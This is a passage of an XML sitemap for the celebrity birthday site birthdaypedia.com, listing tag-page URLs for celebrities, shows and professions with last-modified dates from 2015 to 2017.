<loc>https://birthdaypedia.com/tag/famous-latin-american-in-us/</loc>\n <lastmod>2015-10-09T19:12:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-militars/</loc>\n <lastmod>2015-10-14T16:28:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-model/</loc>\n <lastmod>2015-10-14T17:33:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-movie-actor/</loc>\n <lastmod>2015-10-14T18:24:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-people-born-in-october/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-pop-singer/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-radio-host/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-tv-actress/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/famous-wrestler/</loc>\n <lastmod>2015-10-14T14:32:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fashion/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fashion-design/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fashion-industry/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fc-barcelona/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/female-professional-wrestler/</loc>\n <lastmod>2015-10-14T16:23:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/female-star/</loc>\n <lastmod>2015-10-14T14:11:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ferddy-kreuger-actor/</loc>\n <lastmod>2015-10-14T17:10:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/film-producer/</loc>\n <lastmod>2017-06-20T16:08:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/filmmaker/</loc>\n <lastmod>2016-11-28T16:44:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/films-directed-by-robert-englund/</loc>\n <lastmod>2015-10-14T17:10:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/first/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/first-lady/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/foregin-celebrities/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/foreign-celebrity/</loc>\n <lastmod>2015-10-09T18:41:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/foreign-designer/</loc>\n <lastmod>2015-10-14T18:26:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/foreign-movie-actor/</loc>\n <lastmod>2015-10-09T19:21:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/foreign-musician/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/forrest-gump-leading-actor/</loc>\n <lastmod>2015-10-14T18:24:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fourth/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/fragrances/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/franklin-d-roosevelt/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freddy-kreuger/</loc>\n <lastmod>2015-10-14T17:10:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-actress/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-age/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-bio/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-birthday/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-facts/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-model/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/freida-pinto-slumdog-millionaire/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/friends-actors/</loc>\n <lastmod>2015-10-14T17:51:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gary-busey/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gay-icon/</loc>\n <lastmod>2015-10-14T16:22:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/general-dwight-eisenhower/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/george-clooney/</loc>\n <lastmod>2015-10-14T14:59:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/george-clooney-humanitarian-work/</loc>\n <lastmod>2015-10-14T14:59:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/george-strait/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gerald-mcraney/</loc>\n <lastmod>2017-06-20T16:09:35+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ghandi/</loc>\n <lastmod>2015-10-08T17:52:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/glee-cast/</loc>\n <lastmod>2015-10-14T14:34:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/golden-globe-award/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/golden-globe-award-winners/</loc>\n <lastmod>2015-10-14T18:21:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/golden-state-warriors/</loc>\n <lastmod>2015-10-14T14:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gordon-ramsay/</loc>\n <lastmod>2016-11-28T22:30:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/grammy-award/</loc>\n <lastmod>2015-10-14T17:27:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/great-musicians/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/greatest-actors/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/greatest-bands-ever/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/greatest-musicians-ever/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/greatest-stand-up-comedian/</loc>\n <lastmod>2015-10-14T14:34:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/guitar-leyend/</loc>\n <lastmod>2016-11-28T15:17:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-age/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-bio/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-birthday/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-facts/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-husband/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/gwen-stefani-kids/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/harry-potter/</loc>\n <lastmod>2017-06-20T16:09:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/harry-potter-cast/</loc>\n <lastmod>2015-10-09T19:21:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hayden-panettiere/</loc>\n <lastmod>2017-06-20T16:09:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hbo/</loc>\n <lastmod>2016-11-23T03:16:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hells-kitchen/</loc>\n <lastmod>2016-11-28T22:30:28+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/high-grossing-television-shows/</loc>\n <lastmod>2015-10-14T18:29:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hilary-duff-movie-actress/</loc>\n <lastmod>2015-10-09T16:32:36+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton-2016/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton-biography/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton-birthday/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton-facts/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hillary-clinton-president/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hip-hop/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hip-hop-musician/</loc>\n <lastmod>2015-10-14T17:27:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hollywood/</loc>\n <lastmod>2015-10-09T17:07:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hot-amercian-actress/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hot-movie-actor/</loc>\n <lastmod>2015-10-14T18:21:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-age/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-bio/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-birthday/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-movies/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-wife/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-jackman-wolverine/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/hugh-laurie/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ian-mckellen/</loc>\n <lastmod>2015-10-14T16:23:53+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ian-mckellens-life/</loc>\n <lastmod>2015-10-14T16:23:53+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/icarly/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/identity-thief/</loc>\n <lastmod>2015-10-14T14:26:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-businessman/</loc>\n <lastmod>2015-10-09T18:38:44+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-people/</loc>\n <lastmod>2015-10-09T16:42:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-people-from-film-industry/</loc>\n <lastmod>2015-10-14T18:30:13+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-politician/</loc>\n <lastmod>2015-10-09T18:24:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-radio-host/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/important-tv-host/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/india/</loc>\n <lastmod>2015-10-08T17:52:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/indian-outlaw/</loc>\n <lastmod>2015-10-14T14:36:15+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/international-clothing-line/</loc>\n <lastmod>2015-10-14T18:26:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/international-medical-corps/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/iron-lady/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/italian-important-people/</loc>\n <lastmod>2015-10-14T18:26:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jack-black/</loc>\n <lastmod>2015-10-14T14:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jack-nicholson/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jack-nicholson-bio/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jack-nicholson-oscar-win/</loc>\n <lastmod>2015-10-13T19:53:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/james-hugh-calum-laurie/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jamie-oliver/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jay-leno/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jeff-goldblum/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jeff-goldblum-bio/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jeff-goldblum-birthday/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jeff-goldblum-wife/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jep-robertson/</loc>\n <lastmod>2015-10-14T16:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jerry-seinfeld/</loc>\n <lastmod>2015-10-14T14:34:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jessa-duggar/</loc>\n <lastmod>2016-11-28T22:56:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jhonny-unitas/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jim-nabors/</loc>\n <lastmod>2015-10-14T17:46:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jim-nabors-television-man/</loc>\n <lastmod>2015-10-14T17:46:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jimi-hendrix/</loc>\n <lastmod>2016-11-28T15:17:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-cena/</loc>\n <lastmod>2015-10-14T14:32:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-constantine-unitas/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon-birthday/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon-death/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon-facts/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon-life/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-lennon-the-beatles/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/john-unitas/</loc>\n <lastmod>2015-10-14T15:48:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-biography/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-birthday/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-death/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-life/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-show/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-carson-wiki/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-depp/</loc>\n <lastmod>2015-10-14T17:33:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/johnny-depps-first-job/</loc>\n <lastmod>2015-10-14T17:33:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/jon-stewart/</loc>\n <lastmod>2016-11-23T03:16:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/justin-beiber-girlfriend/</loc>\n <lastmod>2015-10-14T18:44:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kansas-celebrity/</loc>\n <lastmod>2015-10-09T19:11:54+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kanye-west/</loc>\n <lastmod>2015-10-14T17:27:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kardashians/</loc>\n <lastmod>2016-11-28T23:10:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kate-upton/</loc>\n <lastmod>2015-10-14T17:33:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/katie-holmes-ex/</loc>\n <lastmod>2015-10-14T18:21:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/keanu-reeves/</loc>\n <lastmod>2015-10-09T17:07:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kelly-clarkson/</loc>\n <lastmod>2015-10-14T14:32:59+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kendall-jenner/</loc>\n <lastmod>2016-11-28T23:10:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/khloe-kardashian/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-age/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-bio/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-birthday/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-facts/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-kayne/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kim-kardashian-sex-tape/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/king-of-country/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kris-jenner/</loc>\n <lastmod>2016-11-28T22:46:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/krla/</loc>\n <lastmod>2015-10-14T14:33:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/kung-fu-panda/</loc>\n <lastmod>2015-10-14T14:26:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/la-toya-jackson/</loc>\n <lastmod>2015-10-14T16:28:24+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lamar-odon/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/latin-american-celebrity/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/latin-culture-artist/</loc>\n <lastmod>2015-10-09T19:21:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/latin-infused-jazz-music/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/latin-infused-rock-music/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/laurence-tureaud/</loc>\n <lastmod>2015-10-14T16:22:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/law/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/leading-with-my-chin/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lenny-kravitz/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/leo-dicaprio/</loc>\n <lastmod>2016-11-28T19:27:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lethal-weapon/</loc>\n <lastmod>2015-10-14T18:19:18+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/libra-celebrities/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/libra-celebs/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/libra-presidents/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/linda-mccartney/</loc>\n <lastmod>2015-10-14T17:57:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lionel-messi/</loc>\n <lastmod>2015-10-14T18:13:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/liverpool-celebrity/</loc>\n <lastmod>2015-10-14T18:23:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lost/</loc>\n <lastmod>2015-10-09T16:55:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/lost-cast/</loc>\n <lastmod>2015-10-14T18:29:39+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/ludacris/</loc>\n <lastmod>2015-10-09T16:47:50+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mahatma-ghandi/</loc>\n <lastmod>2015-10-08T17:52:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mamma-mia/</loc>\n <lastmod>2015-10-14T18:03:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mandy-song/</loc>\n <lastmod>2015-10-14T17:57:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-age/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-birthday/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-dancing-with-the-stars/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-daughter/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-saved-by-the-bell/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mario-lopez-wife/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/marion-cotillard/</loc>\n <lastmod>2015-10-09T16:31:26+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mark-anthony/</loc>\n <lastmod>2015-10-09T16:45:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/mark-twain/</loc>\n <lastmod>2016-11-23T03:17:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/maryland-celebrity/</loc>\n <lastmod>2015-10-14T18:42:25+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matrix/</loc>\n <lastmod>2015-10-09T17:07:27+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/matt-damon/</loc>\n 